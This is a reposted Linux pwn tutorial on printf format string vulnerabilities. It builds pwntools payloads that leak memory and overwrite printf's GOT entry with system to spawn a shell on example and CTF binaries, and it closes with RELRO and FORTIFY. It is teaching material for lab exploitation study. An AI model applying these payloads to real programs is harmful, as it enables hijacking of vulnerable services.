Format string vulnerabilities in Linux pwn


2025-07-16 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article covers format string vulnerabilities in Linux pwn: how they arise in the printf function family, how to use them to read and write arbitrary memory, and which mitigations get in the way.

0x00 Vulnerabilities in the printf function

The printf function family is one of the most commonly used function families in C programming. Normally we call it in the form printf([format string], parameters), for example

char s[20] = "Hello world!\n"; printf("%s", s);

However, to save effort it is sometimes written as

char s[20] = "Hello world!\n"; printf(s);

This is in fact a very dangerous way to write it. Because of a design flaw in the printf function family, when an attacker controls the first parameter (the format string), they get the opportunity to read and write arbitrary memory addresses.

0x01 Using the format string vulnerability to read arbitrary addresses

First, let's look at a simple example of our own, ~/format_x86/format_x86. The code is very simple. To leave a backdoor, I wrote a showVersion() function that calls system(). Everything else is an infinite loop that reads input and passes it to printf() in the unsafe way described above. Normally, whatever we enter is echoed back as is, but the output changes when we enter certain characters.

As you can see, when we enter a format specifier that printf recognizes, printf interprets it and outputs the result. The principle is simple: printf("%s", "Hello world") parses its first parameter, "%s", as the format string. Here we pass a variable directly to printf, so when that variable happens to contain format specifiers, printf parses them as well. So what is the output that follows? Let's continue the experiment.

We set a breakpoint on the call _printf line, start the program under the debugger, and enter a long run of %x. The output is shown in the figure.

At this point, the stack is as shown in the figure. It is easy to see that the output is exactly the run of data starting at esp-4 and going down. So in theory we can obtain a limited range of stack data by stacking up %x. Can we leak other data as well? We know the format string also supports %s, which outputs a string: it reads the corresponding parameter, treats it as a pointer, and prints the string stored at that address. Let's enter a single %s first and observe.

We see that the output is %s followed by a line break. The corresponding stack and data are as follows:

At the top of the stack is the first parameter, which points to the %s we entered. The second parameter holds the same address as the first, so it too resolves to "%s" followed by the newline 0x0A. Since our input sits on the stack where printf reads its parameters, we can put an address in the input and make a %s line up with exactly that address, so that printf outputs the string it points to. This gives us a read of an arbitrary address.

From the debugging session above, we can see that our input begins at the sixth parameter (in the figure above, the sixth entry from the top of the stack is 0x000A7325, that is, "%s\n\x00"). So we can construct the string "\x01\x80\x04\x08%x.%x.%x.%x.%s". The address at the front is derived from the ELF load address, 0x08048000. Why 0x08048001 and not 0x08048000? If you are interested, you can try it yourself.

Since the string contains non-printable characters, we cannot type it directly, so this time we debug with pwntools and IDA attached to the process.

We successfully leaked the contents of the address 0x08048001.

After this experiment, the payload we used to leak the specified address should be easy to understand. Since the body of our input sits exactly at the position of printf's sixth parameter, we place the address at the very beginning so that printf treats it as the sixth parameter. The rest is the format string: %x consumes the second to fifth parameters (the pointer to our input is the first parameter), and %s interprets the sixth parameter as an address. But what if the input length is limited and our input lies beyond, say, the tenth parameter of printf? Stacking up %x is clearly not practical. So we need another feature of format strings.

A format string can select the nth argument directly using a special notation. For example, to output the fifth parameter we write %4$s, for the sixth parameter %5$s, and in general for the nth parameter %(n-1)$[conversion specifier]. So our payload can be simplified to "\x01\x80\x04\x08%5$s".
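The two leak payloads described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper names `p32`, `leak_stacked` and `leak_positional` are made up for this sketch (`p32` is a stand-in for the pwntools function of the same name), and `param_index` counts printf parameters with the format string itself as parameter 1, as the text does.

```python
def p32(value):
    # Stand-in for pwntools' p32: pack a 32-bit value as little-endian bytes.
    return value.to_bytes(4, "little")


def leak_stacked(addr, param_index):
    # %x consumes parameters 2 .. param_index-1, then %s dereferences
    # parameter param_index, which is where our address bytes sit.
    return p32(addr) + b"%x." * (param_index - 2) + b"%s"


def leak_positional(addr, param_index):
    # Same read, but selecting the parameter directly with %(n-1)$s.
    return p32(addr) + b"%" + str(param_index - 1).encode() + b"$s"


if __name__ == "__main__":
    print(leak_stacked(0x08048001, 6))
    print(leak_positional(0x08048001, 6))
```

The positional form stays the same length no matter how deep on the stack the input sits, which is what makes it usable when the input size is limited.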

0x02 Using the format string vulnerability to write arbitrary addresses

Although the format string vulnerability gives us an arbitrary address read, a read alone is not enough to get a shell; we also need an arbitrary address write. So in this section we introduce another feature of format strings: writing with printf.

printf has a special conversion specifier, %n. Unlike the other specifiers, which control the format and content of the output, %n writes the number of characters output so far into the memory pointed to by the corresponding parameter. We change the payload to "\x8c\x97\x04\x08%5$n", where 0x0804978c is the start address of the .bss section and is writable. Before execution the content at that address is 0; after printf executes, it becomes 4. Looking at the output, we see that exactly four characters, "\x8c\x97\x04\x08", were printed (the newline comes after %n and is not counted). We then change the payload to "\x8c\x97\x04\x08%2048c%5$n" and successfully change the content of 0x0804978c to 0x804 (4 + 2048 = 2052).
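The count arithmetic behind %n can be checked with a small sketch. The function name `write_with_n` is hypothetical and the code assumes the 32-bit layout used in this section, where the 4-byte target address is printed first and therefore already contributes 4 to the count.

```python
def write_with_n(addr, value, arg_index):
    """Build a 32-bit payload that stores `value` at `addr` via %n."""
    addr_bytes = addr.to_bytes(4, "little")   # printed first: 4 characters
    if len(addr_bytes) > value:
        raise ValueError("value is smaller than the bytes already printed")
    pad = value - len(addr_bytes)             # characters still to be printed
    fmt = b"" if pad == 0 else b"%" + str(pad).encode() + b"c"
    return addr_bytes + fmt + b"%" + str(arg_index).encode() + b"$n"


if __name__ == "__main__":
    print(write_with_n(0x0804978C, 4, 5))
    print(write_with_n(0x0804978C, 0x804, 5))
```

With value 4 no padding is needed, and with value 0x804 the padding is 2052 - 4 = 2048, matching the two payloads in the text.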

Now that we have verified both reading and writing arbitrary addresses, we can construct an exploit to get a shell.

Since we can write to any address and the program already uses system, we can simply hijack some function's GOT entry so that it points to the PLT entry of system, and thereby execute system("/bin/sh"). Which function should we hijack? There are only four functions in the GOT, and printf can be called with a single argument, which happens to be our input. So we can hijack printf to system, then send "/bin/sh" through read again, and printf("/bin/sh") becomes system("/bin/sh"). Based on the arbitrary write experiment above, the payload is easy to construct:

from pwn import p32
printf_got = 0x08049778
system_plt = 0x08048320
# p32(printf_got) occupies 4 bytes, so subtract 4 from system_plt
payload = p32(printf_got) + b"%" + str(system_plt - 4).encode() + b"c%5$n"

After sending the payload, you can see that the printf entry in the GOT has been hijacked.

Send "/bin/sh" at this point and you get the shell.

But there is another problem. If you debug this yourself, you will find that single-stepping over the call _printf line takes an unusually long time, and that during io.interactive() the cursor keeps flickering for a long while as a huge number of blank characters are printed. Reading these characters with io.recvall() shows that the amount of data is as much as 128.28 MB. This is because our payload makes printf output 134513436 padding characters.
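The figures above follow directly from the payload. The short check below uses only the values given in this section; the variable names are chosen for this sketch.

```python
system_plt = 0x08048320

address_bytes = 4                      # p32(printf_got) printed first
padding = system_plt - address_bytes   # width passed to %c
total_output = address_bytes + padding # characters counted by %n
total_mb = total_output / 2**20        # size in MiB

if __name__ == "__main__":
    print(padding, total_output, round(total_mb, 2))
```

A single %n write forces printf to emit as many characters as the numeric value being written, which is why splitting the write into smaller pieces is attractive.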

Since all of our experiments run between the local machine or virtual machine and Docker, we are not affected by network conditions. In a real competition or exploitation scenario, transmitting this much data in one go may stall the connection or even drop it. Therefore we have to write the exploit differently.

We know that on 64-bit there are %lld, %llx and so on for quadword (qword) data. Symmetrically, we can use %hd and %hhx for word and byte data, and the corresponding forms of %n are %hn and %hhn. To keep the program from crashing on a half-modified address, we still need to change the printf entry in the GOT in one go, so when using %hhn we have to modify all four bytes in a single printf call. That means restructuring the payload.

First, let's add the addresses of the four bytes to modify to the payload.

from pwn import p32
printf_got = 0x08049778
system_plt = 0x08048320
payload = p32(printf_got)
payload += p32(printf_got + 1)
payload += p32(printf_got + 2)
payload += p32(printf_got + 3)

Then let's modify the first byte. Since x86 and x86-64 are both little-endian, the byte at printf_got corresponds to the lowest byte of the address, 0x20.

payload += b"%"
payload += str(0x20 - 16).encode()
payload += b"c%5$hhn"

At this point we have set the byte at 0x08049778 to 0x20. Next we need to set the byte at 0x08049778+1 to 0x83. Since we have already output 0x20 bytes (16 bytes of addresses plus 0x20-16 bytes of %c padding), we need to output another 0x83-0x20 bytes.

payload += b"%"
payload += str(0x83 - 0x20).encode()
payload += b"c%6$hhn"

Next is 0x08049778+2, which must become 0x04. We have already output 0x83 bytes, so we output up to 0x04+0x100=0x104 bytes, which %hhn truncates to 0x04.

payload += b"%"
payload += str(0x104 - 0x83).encode()
payload += b"c%7$hhn"

Finally, modify 0x08049778+3, which must become 0x08.

payload += b"%"
payload += str(0x08 - 0x04).encode()
payload += b"c%8$hhn"

The final payload is '\x78\x97\x04\x08\x79\x97\x04\x08\x7a\x97\x04\x08\x7b\x97\x04\x08%16c%5$hhn%99c%6$hhn%129c%7$hhn%4c%8$hhn'
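The byte-by-byte construction can be generalized with modular arithmetic: each %hhn stores the running character count modulo 256, so the padding needed for the next byte is (wanted - written) mod 256. The sketch below is a minimal illustration, not the pwntools implementation; `hhn_payload` is a hypothetical name, and it assumes a 32-bit target whose four byte addresses sit at consecutive parameters starting at `first_index`.

```python
def hhn_payload(target, value, first_index):
    """Write the 32-bit `value` to `target` one byte at a time with %hhn."""
    # Four consecutive byte addresses, each packed little-endian.
    payload = b"".join((target + i).to_bytes(4, "little") for i in range(4))
    written = len(payload)              # printf has emitted these 16 bytes
    for i in range(4):
        wanted = (value >> (8 * i)) & 0xFF   # little-endian: low byte first
        pad = (wanted - written) % 256       # wrap around past 0xFF if needed
        if pad:
            payload += b"%" + str(pad).encode() + b"c"
        payload += b"%" + str(first_index + i).encode() + b"$hhn"
        written += pad
    return payload


if __name__ == "__main__":
    print(hhn_payload(0x08049778, 0x08048320, 5))
```

For printf_got = 0x08049778 and system_plt = 0x08048320 this produces paddings of 16, 99, 129 and 4, for a total output of a few hundred bytes instead of roughly 128 MB.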

Of course, pwntools also provides the fmtstr module, including the FmtStr class, for building format string payloads directly; see http://docs.pwntools.com/en/stable/fmtstr.html for the documentation. The function we use most is fmtstr_payload(offset, {address: data}, numbwritten=0, write_size='byte'). The first parameter, offset, is the offset of the first controllable stack slot (not counting the format string parameter itself). In our example the input is at the sixth parameter, so the offset is 5. The second parameter is a dictionary mapping target addresses to the data to write. numbwritten is the number of bytes printf has already output before our format string is processed; for printf("Hello [var]"), the six characters of "Hello " come before the controllable variable, so the value should be 6. The fourth parameter, write_size, selects %hhn ('byte'), %hn ('short') or %n ('int'). In our example the call can be written as fmtstr_payload(5, {printf_got: system_plt}).

The script to get this example shell can be found in the attachment and will not be repeated here.

0x03 Format string vulnerability exploitation on 64-bit

Having covered format string exploitation on 32-bit, let's move on to 64-bit programs, which are now mainstream. Open the example ~/format_x86-64/format_x86-64. This program is built from the same source file as the example in the previous section, just compiled as 64-bit. As before, we first look for the offset of the controllable stack address. Going by the previous example, our input is at the top of the stack, so it would be the first parameter and the offset should be 0. But shouldn't the top of the stack hold the address of the string? Don't forget that 64-bit passes parameters in rdi, rsi, rdx, rcx, r8, r9 and only then on the stack, so the offset here should be 6. We can confirm this with a run of %llx. With the offset known, and with the GOT entry of printf and the PLT entry of system available directly from the binary, we can use fmtstr_payload to generate the payload. However, we find that this payload fails to change the printf entry in the GOT to the PLT entry of system, even though the payload looks correct in memory. So what is the problem? Let's look at the output of printf.

You can see that only the first three characters of the payload were printed: a space (\x20), \x10 and ` (\x60). Why is that?

Looking back at the payload, it is easy to see that the three characters \x20\x10\x60 are immediately followed by \x00, the string terminator. This is also why we chose 0x08048001 rather than 0x08048000 for the read test in the previous section. Since user-space addresses on 64-bit always contain \x00 in their high-order bytes (a 64-bit address has 16 hexadecimal digits), the previous way of constructing the payload clearly does not work. We need to adjust the payload and put the address at the end.
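The truncation is easy to reproduce without running the target. The sketch below packs the GOT address from this section as a 64-bit little-endian value and shows what a C string function would see; the address-first payload here is a hypothetical example for illustration, not the exact bytes generated by fmtstr_payload.

```python
printf_got = 0x00601020

packed = printf_got.to_bytes(8, "little")    # equivalent to pwntools' p64
address_first = packed + b"%6$lln"           # hypothetical address-first layout

# printf stops parsing its format string at the first NUL byte.
seen_by_printf = address_first.split(b"\x00", 1)[0]

if __name__ == "__main__":
    print(packed)
    print(seen_by_printf)
```

Only the three low bytes of the address survive, and the conversion specifier after the address is never parsed, which is why the address has to move to the end of the payload.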

Because the address contains \x00, we do not write in %hhn segments this time, so our payload is constructed as follows:

from pwn import p64
offset = 6
printf_got = 0x00601020
system_plt = 0x00400460
payload = b"%" + str(system_plt).encode() + b"c%6$lln" + p64(printf_got)

The payload looks fine, but if you test it, you will find that the program crashes right after the output is read with io.recvall(). Why? If you look carefully at the stack in the lower right corner, you will see that the address we constructed is misaligned.

So we also need to adjust the payload so that the data in front of the address is an exact multiple of the address length (8 bytes). The offset at which the address is located has to be adjusted accordingly. The adjusted result is as follows:

from pwn import p64
offset = 8
printf_got = 0x00601020
system_plt = 0x00400460
# "a" pads the format part to 16 bytes and counts as one output character
payload = b"a%" + str(system_plt - 1).encode() + b"c%8$lln" + p64(printf_got)

This time it works.
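The alignment adjustment can be worked out mechanically. The sketch below searches for a layout in which the format part is an exact multiple of 8 bytes and the parameter index points at the slot right after it. It is an illustration under assumptions: `aligned_lln_payload` is a hypothetical helper, the first controllable parameter is taken to be 6 as in the text, and filler characters are placed at the front, so each one reduces the %c width by one.

```python
def aligned_lln_payload(target, value, first_index=6, word=8):
    """Place a 64-bit address after a format part padded to a word boundary."""
    for slots in range(1, 8):            # 8-byte slots used by the format part
        for pad in range(word):          # leading filler characters
            if pad >= value:
                continue                 # keep the %c width at least 1
            fmt = (b"a" * pad
                   + b"%" + str(value - pad).encode() + b"c"
                   + b"%" + str(first_index + slots).encode() + b"$lln")
            if len(fmt) == slots * word:
                # The address now starts exactly at parameter first_index + slots.
                return fmt + target.to_bytes(8, "little")
    raise ValueError("no aligned layout found")


if __name__ == "__main__":
    print(aligned_lln_payload(0x00601020, 0x00400460))
```

For the values in this section the unpadded format part is 15 bytes long, so one filler character brings it to 16 bytes and the address lands at parameter 6 + 2 = 8.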

0x04 Using the format string vulnerability to make the program loop

From the two examples above, we can see that getting a shell through a format string vulnerability often depends on a loop in the program. What if the program has no loop? Previously we used ROP to hijack a function's return address to point at start; this time we will use the format string vulnerability to do the same job.

Let's open the example ~/MMA CTF 2nd 2016-greeting/greeting

Like the previous example, this 32-bit program has system in its GOT (see left) and contains a format string vulnerability. The detailed steps for calculating the offset and constructing the payload are not repeated here. The main problem with this program is that we need printf to trigger the vulnerability, but as the code shows, no other GOT function is called after printf executes. This means that even if we trigger the vulnerability and hijack the GOT, system will never be executed. So we need to find a way to make the program run once more.

As mentioned in an earlier article, although we write code with main as the entry point, the entry point of the compiled program is not main but the start code. The start code calls __libc_start_main, which does some initialization, finally calls main, and does some cleanup after main returns. The process is described at http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html.

Put simply, as the following figure shows, the code in the .init section and every function pointer in the array in the .init_array section are called before main. Likewise, after main returns, the code in the .fini section and every function pointer in the array in the .fini_array section are called.

Our goal is to change the first element of the .fini_array array to start. Note that the contents of this array are modified again once execution restarts from start, and the number of bytes the program can read is limited, so you need to modify two addresses in one go and lay out the payload carefully. A working script can also be found in the attachment.

0x05 Some mitigation mechanisms related to format string vulnerabilities

Among the items checked by the checksec script, we covered the role of NX earlier. In this section we introduce two other mitigation mechanisms, RELRO and FORTIFY, that are relevant to exploiting format string vulnerabilities in Linux pwn. First, RELRO. RELRO stands for Relocation Read-Only. The relocation tables are the GOT and the PLT in the ELF file that we mention so often. The origin and function of these two tables will be described in detail in the article on ret2dl-resolve. For now, what we need to know is that these two tables, as their names suggest, exist to prepare for relocating functions and variables from outside the program (those not defined and implemented in the program itself, such as read: obviously you do not write your own implementation of read when you call it in your code). Because relocation has a performance cost, programs generally use lazy binding as an optimization: the memory address of an external function is looked up and filled into the GOT the first time it is called (for read, that is the first time the program executes call read). Therefore the GOT must be writable. But a writable GOT also offers a very convenient way to exploit a format string vulnerability, namely modifying the GOT. As described earlier, we can use the vulnerability to change the GOT entry of a function (such as puts) to the address of system, so that call puts actually calls system and the parameters passed in are handed to system, which lets us execute system("/bin/sh"). For a program where this is possible, checksec reports the following:

Its RELRO item is Partial RELRO.

RELRO: Full RELRO, as shown at the beginning of the figure, means that all relocation table entries of the program are read-only: neither .got nor .got.plt can be modified. Take such a program (from the exercises of "stack canary and Bypass ideas"), set a breakpoint at call read, and change the buf parameter to an address in the GOT to try to modify it. The program does not report an error, but the data is not modified and read returns -1.

Obviously, when Full RELRO protection is turned on, attempts to hijack got tables through vulnerabilities, including format string vulnerabilities, will be blocked.

Next, we introduce a less common protection, FORTIFY, a source-level protection mechanism implemented by GCC. It checks the source code at compile time to avoid potential buffer overflows. Put simply, once this protection is enabled (by adding -D_FORTIFY_SOURCE=2 at compile time), sensitive functions that may cause vulnerabilities, such as read, fgets, memcpy and printf, are replaced with __read_chk, __fgets_chk, __memcpy_chk, __printf_chk and so on. These _chk functions check whether the length being read or copied exceeds the buffer length. For format strings, they check whether a format string containing %n is located at a writable address that the user could modify, and they prevent a format string from skipping parameters (such as using %7$x directly). Programs with FORTIFY enabled are reported as such by checksec. In addition, the _chk functions are visible in the GOT when the program is disassembled.
